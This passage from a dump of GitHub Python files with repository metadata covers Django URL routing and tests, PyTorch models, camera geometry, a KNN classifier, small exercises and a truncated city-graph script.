quote_label_file_path=quote_label_file_path,\n scratchpad_dataset=scratchpad_dataset,\n )\n","repo_name":"samuelarnesen/nyu-debate-modeling","sub_path":"data/quote_relevance_loader.py","file_name":"quote_relevance_loader.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36296421147","text":"\"\"\"\nDocstring pendiente para este documento\n\"\"\"\n\n\nfrom django.conf.urls import patterns, url\nfrom vehiculo.views import VehiculoListView, VehiculoView, \\\n VehiculoUpdate, VehiculoDelete, DetalleDeVehiculoListView, \\\n DetalleDeVehiculoView, DetalleDeVehiculoUpdate, \\\n DetalleDeVehiculoDelete, ChoferAsignadoListView, \\\n ChoferAsignadoView, ChoferAsignadoUpdate, \\\n ChoferAsignadoDelete\n\n\nurlpatterns = patterns('',\n url(r'^$',\n VehiculoListView.as_view(),\n name='list_vehiculo'),\n url(r'^nuevo/',\n VehiculoView.as_view(),\n name='add_vehiculo'),\n url(r'^editar/(?P\\d+)/$',\n VehiculoUpdate.as_view(),\n name='edit_vehiculo'),\n url(r'^eliminar/(?P\\d+)/$',\n VehiculoDelete.as_view(),\n name='eliminar_vehiculo'),\n url(r'^detalle_de_vehiculo/$',\n DetalleDeVehiculoListView.as_view(),\n name='list_detalledevehiculo'),\n url(r'^detalle_de_vehiculo/nuevo/',\n DetalleDeVehiculoView.as_view(),\n name='add_detalledevehiculo'),\n url(r'^detalle_de_vehiculo/editar/(?P\\d+)/$',\n DetalleDeVehiculoUpdate.as_view(),\n name='edit_detalledevehiculo'),\n url(r'^detalle_de_vehiculo/eliminar/(?P\\d+)/$',\n DetalleDeVehiculoDelete.as_view(),\n name='eliminar_detalledevehiculo'),\n url(r'^chofer_asignado/$',\n ChoferAsignadoListView.as_view(),\n name='list_choferasignado'),\n url(r'^chofer_asignado/nuevo/',\n ChoferAsignadoView.as_view(),\n name='add_choferasignado'),\n url(r'^chofer_asignado/editar/(?P\\d+)/$',\n ChoferAsignadoUpdate.as_view(),\n name='edit_choferasignado'),\n url(r'^chofer_asignado/eliminar/(?P\\d+)/$',\n ChoferAsignadoDelete.as_view(),\n name='eliminar_choferasignado'),\n )\n","repo_name":"yusnelvy/mtvmcotizacionv02","sub_path":"vehiculo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73408798826","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pdb\n\nclass ptomlp(nn.Module):\n\n def __init__(self):\n '''\n Args:\n num_features: int. Number of channels\n '''\n super(ptomlp, self).__init__()\n self.l1 = nn.Linear(18, 128)\n torch.nn.init.xavier_uniform(self.l1.weight)\n self.l1.bias.data.fill_(0.01)\n self.l2 = nn.Linear(128, 256)\n torch.nn.init.xavier_uniform(self.l2.weight)\n self.l2.bias.data.fill_(0.01)\n self.l3 = nn.Linear(256,3)\n torch.nn.init.xavier_uniform(self.l3.weight)\n self.l3.bias.data.fill_(0.01)\n #self.BN_a2 = nn.BatchNorm2d(num_features)\n\n def forward(self, x):\n out = self.l1(x)\n out = F.relu(out)\n out = self.l2(out)\n out = F.relu(out)\n out = self.l3(out)\n\n return out\n\n\n\n\n\n ","repo_name":"Gyiming/Adaptive-Adversarial-Network","sub_path":"models/cifar10/ptolemymlp.py","file_name":"ptolemymlp.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19748100670","text":"\"\"\"empty message\n\nRevision ID: 450600fd7864\nRevises: fcc3038adf2b\nCreate Date: 2019-06-28 20:31:04.485654\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '450600fd7864'\ndown_revision = 'fcc3038adf2b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('username', table_name='admin')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index('username', 'admin', ['username'], unique=True)\n # ### end Alembic commands ###\n","repo_name":"baixiaosheng-no1/HelloBlog","sub_path":"eBlog/migrations/versions/450600fd7864_.py","file_name":"450600fd7864_.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23644444462","text":"import json\nimport cv2\nimport numpy as np\nfrom numpy.linalg import inv\n\n\ndef distortion_coeffs(k1=0.0, k2=0.0, p1=0.0, p2=0.0, k3=0.0):\n \"\"\"Composes a 5x1 cv2 compatible matrix of distortion coefficients\n\n Args:\n k1 (float): First radial distortion coefficient.\n k2 (float): Second radial distortion coefficient.\n p1 (float): First tangential distortion coefficient.\n p2 (float): Second tangential distortion coefficient.\n k3 (float): Third radial distortion coefficient.\n \"\"\"\n return np.array([k1, k2, p1, p2, k3])\n\n\ndef intrinsic_matrix(fx=1.0, fy=1.0, cx=0.5, cy=0.5):\n \"\"\"Composes a 3x3 intrinsic matrix from the provided information\n\n Args:\n fx (float): Focal length of the camera in x.\n fy (float): Focal length of the camera in y.\n cx (float): X-coordinate of the principal point.\n cy (float): Y-coordinate of the principal point.\n \"\"\"\n return np.array([[fx, 0.0, cx], [0.0, fy, cy], [0.0, 0.0, 1.0]])\n\n\ndef pose_matrix(R=None, t=None):\n \"\"\"Composes the 4x4 pose matrix from R and t\n\n Args:\n R (ndarray): Either a 3x3 rotation matrix or a Rodrigues rotation\n vector. Defaults to no rotation.\n t (ndarray): A 3 element vector denoting the translation. Defaults to\n [0, 0, 0].\n \"\"\"\n # Default to no rotation\n if R is None:\n R = np.eye(3)\n # Default to origin\n if t is None:\n t = [0, 0, 0]\n # Convert lists to ndarrays\n R = Marshal.ndarrayify(R)\n t = Marshal.ndarrayify(t)\n # Convert from Rodrigues notation if necessary\n if R.shape == (3,):\n R, _ = cv2.Rodrigues(R)\n # Construct the matrix\n H = np.eye(4)\n H[:3, :3] = R\n H[:3, 3] = t\n return H\n\n\ndef pose_to_vectors(Tw):\n \"\"\"Extracts the rotation and translation vector from a pose matrix\n\n Args:\n Tw (ndarray): A 4x4 pose matrix.\n\n Returns: A tuple (r, t)\n r (ndarray): Rodrigues rotation vector.\n t (ndarray): Translation vector.\n \"\"\"\n r, _ = cv2.Rodrigues(Tw[:3, :3])\n r = np.squeeze(r)\n t = Tw[:3, 3]\n return r, t\n\n\nclass Marshal(object):\n \"\"\"A collection of useful marshalling and demarshalling functions\"\"\"\n\n @staticmethod\n def listify(d):\n \"\"\"Converts all ndarrays in dict d to lists\"\"\"\n if isinstance(d, np.ndarray):\n return d.tolist()\n if not isinstance(d, dict):\n return d\n return {k: Marshal.listify(v) for k, v in d.items()}\n\n @staticmethod\n def ndarrayify(d):\n \"\"\"Converts all lists in d to ndarrays\"\"\"\n if isinstance(d, np.ndarray):\n return d\n if isinstance(d, list):\n return np.array(d)\n if not isinstance(d, dict):\n return d\n return {k: Marshal.ndarrayify(v) for k, v in d.items()}\n\n @staticmethod\n def jsonify(d):\n \"\"\"Converts the data into a json compatible string.\n\n This opperation converts the ids into strings and the ndarrays into\n lists.\n\n Args:\n d (dict): A dictionary to make json compatible.\n \"\"\"\n return json.dumps({str(id_): x for id_, x in Marshal.listify(d).items()})\n\n\ndef back_project(points_2d, z_worlds, K, Tw, dist_coeffs):\n \"\"\"Back project points in the image plane to 3D\n\n A single point in the image plane correspods to a ray in 3D space. This\n method determines the 3D cooridates of the points where rays cast out\n of the image plane intersect with the provided heights.\n\n Args:\n points_2d (ndarray): An Nx2 array of image coordinates to back\n project.\n z_worlds (ndarray): A list-like object of N heights (assuming z=0\n is the ground plane) to back project to.\n K (ndarray): A 3x3 intrinsic matrix.\n Tw (ndarray): A 4x4 pose matrix.\n dist_coeffs (ndarray): An array of distortion coefficients of the form\n [k1, k2, [p1, p2, [k3]]], where ki is the ith\n radial distortion coefficient and pi is the ith\n tangential distortion coeff.\n \"\"\"\n # Unpack the intrinsics we are going to need for this calculation.\n fx, fy = K[0, 0], K[1, 1]\n ccx, ccy = K[0, 2], K[1, 2]\n points_2d = Marshal.ndarrayify(points_2d)\n points_2d = cv2.undistortPoints(\n points_2d[:, np.newaxis], K, dist_coeffs, P=K\n ).squeeze(axis=1)\n points_3d = []\n # TODO: Vectorize\n for (x_image, y_image), z_world in zip(points_2d, z_worlds):\n kx = (x_image - ccx) / fx\n ky = (y_image - ccy) / fy\n # get point position in camera coordinates\n z3d = (z_world - Tw[2, 3]) / np.dot(Tw[2, :3], [kx, ky, 1])\n x3d = kx * z3d\n y3d = ky * z3d\n # transform the point to world coordinates\n x_world, y_world = (Tw @ [x3d, y3d, z3d, 1])[:2]\n points_3d.append((x_world, y_world, z_world))\n return np.array(points_3d)\n\n\ndef distortion(points_2d, K, dist_coeffs=None):\n if dist_coeffs is None:\n return points_2d\n\n k1, k2, p1, p2, k3 = dist_coeffs\n cx, cy = K[0, 2], K[1, 2]\n fx, fy = K[0, 0], K[1, 1]\n\n # To relative coordinates\n x = (points_2d[:, 0] - cx) / fx\n y = (points_2d[:, 1] - cy) / fy\n r2 = x * x + y * y\n\n # Radial distorsion\n xdistort = x * (1 + k1 * r2 + k2 * r2 * r2 + k3 * r2 * r2 * r2)\n ydistort = y * (1 + k1 * r2 + k2 * r2 * r2 + k3 * r2 * r2 * r2)\n\n # Tangential distorsion\n xdistort += 2 * p1 * x * y + p2 * (r2 + 2 * x * x)\n ydistort += p1 * (r2 + 2 * y * y) + 2 * p2 * x * y\n\n # Back to absolute coordinates.\n xdistort = xdistort * fx + cx\n ydistort = ydistort * fy + cy\n\n return np.stack([xdistort, ydistort]).T\n\n\ndef project(points_3d, K, Tw, dist_coeffs=None):\n def make_3x4(K, Tw):\n tmp = np.append(np.eye(3), np.zeros((3, 1)), axis=1)\n return K @ tmp @ np.linalg.inv(Tw)\n\n P = make_3x4(K, Tw)\n p3d_ = np.hstack((points_3d, np.ones([len(points_3d), 1], dtype=points_3d.dtype)))\n p2d_ = p3d_ @ P.T\n p2d = p2d_[:, 0:2] / p2d_[:, 2:3]\n\n # only valid point needs distortion\n valid = np.all(p2d > 0, axis=1) & np.all(p2d < 1, axis=1)\n valid_p2d = p2d[valid]\n if len(valid_p2d) > 0:\n p2d[valid] = distortion(valid_p2d, K, dist_coeffs)\n\n return np.squeeze(p2d)\n\n\nclass Camera(object):\n \"\"\"Data class that models a single camera's intrinsics and extrinsics\"\"\"\n\n def __init__(self, K=None, Tw=None, dist_coeffs=None):\n \"\"\"Contruct a Camera\n\n Args:\n K (ndarray): A 3x3 intrinsic matrix\n Tw (ndarray): A 4x4 pose matrix\n dist_coeffs (ndarray): An array of distortion coefficients of the\n form [k1, k2, [p1, p2, [k3]]], where k_i is\n the ith radial_distortion coefficient and\n p_i is the ith tangential distortion coeff.\n \"\"\"\n self.K = intrinsic_matrix() if K is None else Marshal.ndarrayify(K)\n if self.K.shape != (3, 3):\n raise ValueError(\"Intrinsic Matrix K should be 3x3.\")\n self.Tw = pose_matrix() if Tw is None else Marshal.ndarrayify(Tw)\n if self.Tw.shape != (4, 4):\n raise ValueError(\"Pose Matrix K should be 4x4.\")\n dist_coeffs = [] if dist_coeffs is None else dist_coeffs\n self.dist_coeffs = distortion_coeffs(*dist_coeffs)\n\n def update_camera_location(self, new_location):\n self.Tw[:3, -1] = new_location\n\n def update_euler_angles(self, new_angles):\n rx, ry, rz = map(lambda r: r * np.pi / 180, new_angles)\n\n sa = np.sin(rx)\n ca = np.cos(rx)\n sb = np.sin(ry)\n cb = np.cos(ry)\n sg = np.sin(rz)\n cg = np.cos(rz)\n\n r11 = cb * cg\n r12 = cg * sa * sb - ca * sg\n r13 = sa * sg + ca * cg * sb\n r21 = cb * sg\n r22 = sa * sb * sg + ca * cg\n r23 = ca * sb * sg - cg * sa\n r31 = -sb\n r32 = cb * sa\n r33 = ca * cb\n\n R = np.asarray([[r11, r12, r13], [r21, r22, r23], [r31, r32, r33]])\n self.Tw[0:3, 0:3] = inv(R)\n\n @property\n def euler_angles(self):\n Tw = np.linalg.inv(self.Tw)\n rx = np.arctan2(Tw[2, 1], Tw[2, 2])\n ry = np.arctan2(-Tw[2, 0], np.sqrt(Tw[2, 1] ** 2 + Tw[2, 2] ** 2))\n rz = np.arctan2(Tw[1, 0], Tw[0, 0])\n\n rx, ry, rz = map(lambda r: r * 180 / np.pi, [rx, ry, rz])\n return rx, ry, rz\n\n @property\n def aspect(self):\n \"\"\"Returns the aspect ratio of the camera\"\"\"\n return self.K[1, 1] / self.K[0, 0]\n\n @property\n def location(self):\n \"\"\"Returns the 3D location of the camera\"\"\"\n return self.Tw[:3, -1]\n\n @property\n def look_at(self):\n \"\"\"Returns the intersection of the optical axis and the floor\"\"\"\n return self.back_project(points_2d=[[0.5, 0.5]], z_worlds=[0.0])[0]\n\n def unnormalized(self, h):\n \"\"\"Returns an unnormalized version of the intrinsic matrix K\"\"\"\n w = self.aspect * h\n return np.diag([w, h, 1.0]) @ self.K\n\n def back_project(self, points_2d, z_worlds):\n \"\"\"Back project points in the image plane to 3D\n\n A single point in the image plane correspods to a ray in 3D space. This\n method determines the 3D cooridates of the points where rays cast out\n of the image plane intersect with the provided heights.\n\n Args:\n points_2d (ndarray): An Nx2 array of image coordinates to back\n project.\n z_worlds (ndarray): A list-like object of N heights (assuming z=0\n is the ground plane) to back project to.\n \"\"\"\n return back_project(\n points_2d=points_2d,\n z_worlds=z_worlds,\n K=self.K,\n Tw=self.Tw,\n dist_coeffs=self.dist_coeffs,\n )\n\n def get_distance(self, points_3d):\n \"\"\"Get distande of the 3D points to camera\n\n Args:\n points_3d (ndarray): An Nx3 array of 3D points to calculate\n distance\n \"\"\"\n return np.linalg.norm(points_3d - self.location, axis=-1)\n\n def project(self, points_3d):\n \"\"\"Project the 3D points into the image plane of this camera\n\n Args:\n points_3d (ndarray): An Nx3 array of 3D points to project.\n \"\"\"\n return project(\n points_3d=points_3d, K=self.K, Tw=self.Tw, dist_coeffs=self.dist_coeffs\n )\n\n @classmethod\n def from_dict(cls, d):\n \"\"\"Contruct a camera from a dict\n\n Args:\n d (dict): A dictionary containing entries for:\n - 'K': A 3x3 intrinsic matrix\n - 'Tw': A 4x4 pose matrix\n - 'dist_coeffs': A (5,) vector of distortion coefficients\n \"\"\"\n w, h = d.get(\"image_wh\", [1.0, 1.0])\n return Camera(\n K=cls.normalize(d[\"K\"], w, h) if \"K\" in d else None,\n Tw=d.get(\"Tw\", d.get(\"pose\")),\n dist_coeffs=d.get(\"dist_coeffs\"),\n )\n\n @staticmethod\n def normalize(K, w, h):\n \"\"\"Normalizes the intrinsic matrix K by the given width and height\"\"\"\n return np.diag([1.0 / w, 1.0 / h, 1.0]) @ K\n\n def to_dict(self, legacy_format=False):\n \"\"\"Returns a dict representation of this camera\"\"\"\n # We include a look_at point to make life easier on the visualiztion\n # team. They need to know where the optical axis intersects with the\n # groundplane to properly visualize the cameras. If we don't serialize\n # this value, they would need to write a javascript implementation of\n # backprojection. This saves them some trouble.\n d = {\n \"K\": self.K,\n \"Tw\": self.Tw,\n \"dist_coeffs\": self.dist_coeffs,\n \"look_at\": self.look_at,\n }\n if legacy_format:\n # Arbitrarily choose a height to be 1\n h = 1\n w = self.aspect * h\n d[\"K\"] = self.unnormalized(h)\n d[\"image_wh\"] = [w, h]\n return d\n\n def __eq__(self, other):\n \"\"\"Override default __eq__ because ndarrays are not comparable\"\"\"\n if not isinstance(other, Camera):\n return False\n return all(\n [\n np.allclose(self.K, other.K),\n np.allclose(self.Tw, other.Tw),\n np.allclose(self.dist_coeffs, other.dist_coeffs),\n ]\n )\n\n def __repr__(self):\n return \"Camera:\\n\\tK={}\\n\\tTw={}\\n\\tdist_coeffs={}\".format(\n self.K, self.Tw, self.dist_coeffs\n )\n","repo_name":"longcw/crossview_3d_pose_tracking","sub_path":"crossview_dataset/calib/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":12707,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"37"} +{"seq_id":"427595311","text":"from torch import nn\nfrom torch.nn import functional as F\nfrom torch.nn.utils import remove_spectral_norm\n\nfrom models.modules.inception_modules import SPADEInvertedResidualChannels\nfrom models.modules.inception_modules import _get_named_block_list\nfrom models.modules.sync_batchnorm import SynchronizedBatchNorm2d\nfrom models.networks import BaseNetwork\n\n\nclass InceptionSPADEGenerator(BaseNetwork):\n @staticmethod\n def modify_commandline_options(parser, is_train):\n return parser\n\n def __init__(self, opt):\n super(InceptionSPADEGenerator, self).__init__()\n self.opt = opt\n nf = opt.ngf\n\n self.fc_norm = SynchronizedBatchNorm2d(16 * nf, affine=True)\n\n self.sw, self.sh = self.compute_latent_vector_size(opt)\n\n self.fc = nn.Conv2d(self.opt.semantic_nc, 16 * nf, 3, padding=1)\n\n self.head_0 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n\n self.G_middle_0 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n self.G_middle_1 = SPADEInvertedResidualChannels(16 * nf, 16 * nf, opt)\n\n self.up_0 = SPADEInvertedResidualChannels(16 * nf, 8 * nf, opt)\n self.up_1 = SPADEInvertedResidualChannels(8 * nf, 4 * nf, opt)\n self.up_2 = SPADEInvertedResidualChannels(4 * nf, 2 * nf, opt)\n self.up_3 = SPADEInvertedResidualChannels(2 * nf, 1 * nf, opt)\n\n final_nc = nf\n\n if opt.num_upsampling_layers == 'most':\n self.up_4 = SPADEInvertedResidualChannels(1 * nf, nf // 2, opt)\n final_nc = nf // 2\n\n self.conv_img = nn.Conv2d(final_nc, 3, 3, padding=1)\n\n self.up = nn.Upsample(scale_factor=2)\n\n def compute_latent_vector_size(self, opt):\n if opt.num_upsampling_layers == 'normal':\n num_up_layers = 5\n elif opt.num_upsampling_layers == 'more':\n num_up_layers = 6\n elif opt.num_upsampling_layers == 'most':\n num_up_layers = 7\n else:\n raise ValueError('opt.num_upsampling_layers [%s] not recognized' %\n opt.num_upsampling_layers)\n\n sw = opt.crop_size // (2**num_up_layers)\n sh = round(sw / opt.aspect_ratio)\n\n return sw, sh\n\n def forward(self, input, mapping_layers=[]):\n seg = input\n\n ret_acts = {}\n\n x = F.interpolate(seg, size=(self.sh, self.sw))\n x = self.fc(x)\n x = self.fc_norm(x)\n\n if 'fc' in mapping_layers:\n ret_acts['fc'] = x\n\n x = self.head_0(x, seg)\n if 'head_0' in mapping_layers:\n ret_acts['head_0'] = x\n\n x = self.up(x)\n x = self.G_middle_0(x, seg)\n if 'G_middle_0' in mapping_layers:\n ret_acts['G_middle_0'] = x\n\n if self.opt.num_upsampling_layers == 'more' or \\\n self.opt.num_upsampling_layers == 'most':\n x = self.up(x)\n\n x = self.G_middle_1(x, seg)\n if 'G_middle_1' in mapping_layers:\n ret_acts['G_middle_1'] = x\n\n x = self.up(x)\n x = self.up_0(x, seg)\n if 'up_0' in mapping_layers:\n ret_acts['up_0'] = x\n\n x = self.up(x)\n x = self.up_1(x, seg)\n if 'up_1' in mapping_layers:\n ret_acts['up_1'] = x\n\n x = self.up(x)\n x = self.up_2(x, seg)\n if 'up_2' in mapping_layers:\n ret_acts['up_2'] = x\n\n x = self.up(x)\n x = self.up_3(x, seg)\n if 'up_3' in mapping_layers:\n ret_acts['up_3'] = x\n\n if self.opt.num_upsampling_layers == 'most':\n x = self.up(x)\n x = self.up_4(x, seg)\n if 'up_4' in mapping_layers:\n ret_acts['up_4'] = x\n\n x = self.conv_img(F.leaky_relu(x, 2e-1))\n x = F.tanh(x)\n\n if len(mapping_layers) == 0:\n return x\n else:\n return x, ret_acts\n\n def remove_spectral_norm(self):\n x = self.head_0.remove_spectral_norm()\n x = self.G_middle_0.remove_spectral_norm()\n x = self.G_middle_1.remove_spectral_norm()\n\n x = self.up_0.remove_spectral_norm()\n x = self.up_1.remove_spectral_norm()\n x = self.up_2.remove_spectral_norm()\n x = self.up_3.remove_spectral_norm()\n\n if self.opt.num_upsampling_layers == 'most':\n x = self.up_4.remove_spectral_norm()\n\n def get_named_block_list(self):\n return _get_named_block_list(\n self,\n spade=True,\n num_upsampling_layers=self.opt.num_upsampling_layers)\n","repo_name":"snap-research/CAT","sub_path":"models/modules/inception_architecture/inception_spade_generator.py","file_name":"inception_spade_generator.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"37"} +{"seq_id":"20344188530","text":"#ex12.py\n#calculator\n#by Alexander Huber\n#exercises 12\n\ndef main():\n total = eval(input(\"how many calcualtions do you want to make? \"))\n for i in range(total):\n print(\"enter an expression to be calculated:\\t\") \n ans = eval(input()) \n print(ans)\n input(\"press any key to end the program\\n\")\nmain()","repo_name":"alexbyz/HW070172","sub_path":"l03/ex12.py","file_name":"ex12.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10260510862","text":"import pandas as pd\nimport re\n\n\ndef script2speech(script: str) -> pd.DataFrame:\n script = script.replace('\\t', '').replace('\\n'+15*' ','\\n')\n \n dataset = {\n 'character': [],\n 'speech': []\n }\n \n for match in re.finditer(r'(\\n +[A-Z (.)]+\\n)', script):\n cls = match.group(0)\n cls = cls.replace('\\n', '').replace(22*' ', '')\n \n speech_start_idx = match.end(0)\n speech_end_idx = script.find('\\n\\n', speech_start_idx)\n speech = script[speech_start_idx : speech_end_idx]\n speech = speech.replace('\\n', '').replace(10*' ', '')\n \n dataset['character'].append(cls)\n dataset['speech'].append(speech)\n \n return pd.DataFrame(dataset)\n \n","repo_name":"idg7/fmri_classifier","sub_path":"data/preprocess/script2speech.py","file_name":"script2speech.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26561109300","text":"import numpy as np\nfrom scipy.spatial import distance\n\n\nclass KNearestNeighbor(object):\n \"\"\"a KNN classifier with L2 distance\"\"\"\n\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\"\n Train the classifier. This is just memorizing all the training data.\n Inputs:\n - X: A numpy array of shape (num_train, D) containing the training data\n consisting of num_train samples each of dimension D.\n - y: A numpy array of shape (num_train,) containing the training labels, \n where y[i] is the label for X[i].\n \"\"\"\n self.X_train = X\n self.y_train = y\n\n def predict(self, X, k=1, cal_method=0):\n \"\"\"\n Test the classifier. \n Inputs:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n - k: The number of nearest neighbors that vote for the predicted labels.\n - cal_method: method to calculate the distance between test X and train X\n Return:\n - pred_y: Predict output y\n \"\"\"\n # calculate the L2 distance between test X and train X\n if cal_method == 0:\n # no for-loop, vectorized\n dists = self.cal_dists_Eu(X)\n elif cal_method == 1:\n # one for-loop, half-vectorized\n dists = self.cal_dists_Man(X)\n elif cal_method == 2:\n # one for-loop, half-vectorized\n dists = self.cal_dists_Cosine(X)\n else:\n raise ValueError('Invalid value %d for num_loops' % cal_method)\n\n # predict the labels\n num_test = X.shape[0]\n y_pred = np.zeros(num_test)\n for i in range(num_test):\n # the closest k distance loc\n dists_k_min = np.argsort(dists[i])[:k]\n # the closest k distance ,all labels\n close_y = self.y_train[dists_k_min]\n # [0,3,1,3,3,1] -> 3 as y_pred[i]\n y_pred[i] = np.argmax(np.bincount(close_y))\n\n return y_pred\n\n def cal_dists_Eu(self, X):\n \"\"\"\n Calculate the distance with Euclidean Distance(欧式距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n # (X - X_train)*(X - X_train) = -2X*X_train + X*X + X_train*X_train\n # shape (num_test, num_train)\n d1 = np.multiply(np.dot(X, self.X_train.T), -2)\n # shape (num_test, 1)\n d2 = np.sum(np.square(X), axis=1, keepdims=True)\n d3 = np.sum(np.square(self.X_train), axis=1) # shape (1, num_train)\n dists = np.sqrt(d1 + d2 + d3)\n\n return dists\n\n def cal_dists_Man(self, X):\n \"\"\"\n Calculate the distance with Manhattan Distance (曼哈顿距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n dists[i] = np.sum(np.abs(self.X_train - X[i]), axis=1)\n if(i % 100 == 0):\n print(\"Manhattan progress:\" ,i*100/num_test,\"%\")\n\n return dists\n\n def cal_dists_Cosine(self, X):\n \"\"\"\n Calculate the distance with Cosine Distance(余弦距离)\n Input:\n - X: A numpy array of shape (num_test, D) containing the test data\n consisting of num_test samples each of dimension D.\n Return:\n - dists: The distance between test X and train X\n \"\"\"\n num_test = X.shape[0]\n num_train = self.X_train.shape[0]\n dists = np.zeros((num_test, num_train))\n for i in range(num_test):\n for j in range(num_train):\n dists[i][j] = distance.cosine(X[i], self.X_train[j])\n if(i % 100 == 0):\n print(\"Cosine progress:\" ,i*100/num_test,\"%\")\n\n return dists\n","repo_name":"knockkk/2020_CV_class","sub_path":"1_KNN/code/test_cal_method/KNN_Classifier.py","file_name":"KNN_Classifier.py","file_ext":"py","file_size_in_byte":4324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26612316083","text":"N = int(input())\nA = []\nB = []\n\nfor i in range(N):\n a, b = map(int, input().split())\n A.append(a)\n B.append(b)\n\nans = 0\n\nfor a, b in zip(A, B):\n n = b-a+1\n ans += (a+b)*n//2\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-181/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6307292395","text":"import datetime\nfrom unittest import mock\n\nfrom django.db import connections\nfrom django.db.models.sql.compiler import cursor_iter\nfrom django.test import TestCase\n\nfrom .models import Article\n\n\nclass QuerySetIteratorTests(TestCase):\n itersize_index_in_mock_args = 3\n\n @classmethod\n def setUpTestData(cls):\n Article.objects.create(name=\"Article 1\", created=datetime.datetime.now())\n Article.objects.create(name=\"Article 2\", created=datetime.datetime.now())\n\n def test_iterator_invalid_chunk_size(self):\n for size in (0, -1):\n with self.subTest(size=size):\n with self.assertRaisesMessage(\n ValueError, \"Chunk size must be strictly positive.\"\n ):\n Article.objects.iterator(chunk_size=size)\n\n def test_default_iterator_chunk_size(self):\n qs = Article.objects.iterator()\n with mock.patch(\n \"django.db.models.sql.compiler.cursor_iter\", side_effect=cursor_iter\n ) as cursor_iter_mock:\n next(qs)\n self.assertEqual(cursor_iter_mock.call_count, 1)\n mock_args, _mock_kwargs = cursor_iter_mock.call_args\n self.assertEqual(mock_args[self.itersize_index_in_mock_args], 2000)\n\n def test_iterator_chunk_size(self):\n batch_size = 3\n qs = Article.objects.iterator(chunk_size=batch_size)\n with mock.patch(\n \"django.db.models.sql.compiler.cursor_iter\", side_effect=cursor_iter\n ) as cursor_iter_mock:\n next(qs)\n self.assertEqual(cursor_iter_mock.call_count, 1)\n mock_args, _mock_kwargs = cursor_iter_mock.call_args\n self.assertEqual(mock_args[self.itersize_index_in_mock_args], batch_size)\n\n def test_no_chunked_reads(self):\n \"\"\"\n If the database backend doesn't support chunked reads, then the\n result of SQLCompiler.execute_sql() is a list.\n \"\"\"\n qs = Article.objects.all()\n compiler = qs.query.get_compiler(using=qs.db)\n features = connections[qs.db].features\n with mock.patch.object(features, \"can_use_chunked_reads\", False):\n result = compiler.execute_sql(chunked_fetch=True)\n self.assertIsInstance(result, list)\n","repo_name":"django/django","sub_path":"tests/queries/test_iterator.py","file_name":"test_iterator.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"16174863288","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 22 14:12:49 2022\r\n\r\n@author: CJ\r\n\"\"\"\r\nimport queue\r\nimport csv\r\nimport time\r\n \r\nclass city_US(object):\r\n def __init__(self, name, number, state):\r\n self.Name = name\r\n self.children = dict()\r\n self.Number = number\r\n self.State = state\r\n def add_child(self, name, cost):\r\n self.children[name] = cost\r\n\r\n# Not ranking here just using object\r\nclass priorityQueueObject(object):\r\n def __init__(self, name, pathcost):\r\n self.Number = name\r\n self.PathCost = pathcost\r\n \r\ndef readinTowns():\r\n cityDict = dict()\r\n # Create all entries of Dict with txt file with all city names\r\n # Dict keys will be a unique number identifier to avoid cities w/ same name in diff states\r\n with open(\"C:/Users/CJ/Documents/Grad_2022-23/ECE577/Project1/sf12010placename.txt\") as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter='\\t')\r\n line_count = 0\r\n for row in csv_reader:\r\n if line_count == 0:\r\n line_count += 1\r\n else:\r\n StateNumber = int(row[0])*100000 + int(row[2])\r\n StateNumberStr = str(StateNumber).zfill(7)\r\n cityDict[StateNumberStr] = city_US(row[3], StateNumberStr, row[1])\r\n # Add adjacent towns within 25 mile radius of each town in dict \r\n with open(\"C:/Users/CJ/Documents/Grad_2022-23/ECE577/Project1/sf12010placedistance25miles.csv\") as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n line_count = 0\r\n for row in 